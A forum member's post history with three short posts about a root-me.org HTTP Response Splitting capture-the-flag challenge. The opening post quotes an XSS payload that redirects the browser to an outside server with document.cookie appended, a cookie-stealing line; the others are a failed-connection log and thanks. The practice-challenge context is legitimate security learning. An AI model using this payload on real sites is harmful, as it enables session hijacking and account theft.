Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - lvl

Pages: [1]
1
General discussion / Re: Challenge HTTP Response Splitting
« on: May 28, 2014, 06:43:05 pm »
thanks

2
General discussion / Re: Challenge HTTP Response Splitting
« on: May 27, 2014, 05:41:22 pm »
Thank you very much but I cant connect.  :-[

Log :
  • Created TCP socket.
  • [!] Unable to resolve.
    [!] Closing SOCK_STREAM and exiting.



3
General discussion / Challenge HTTP Response Splitting
« on: May 25, 2014, 07:53:05 pm »
Hi,
Can you help me to correct this code? I do not manage to validate the test of this challenge.

The variable xss has to contain:
Code: [Select]
xss  = "<html><script>document.location=\"http://myserver.com/index.php?cookie=\"+document.cookie</script></html>"
code :
http://pastebin.com/GsW7LFC7

challenge :
http://www.root-me.org/en/Challenges/Web-Client/HTTP-Response-Splitting-381

Thank you!

Pages: [1]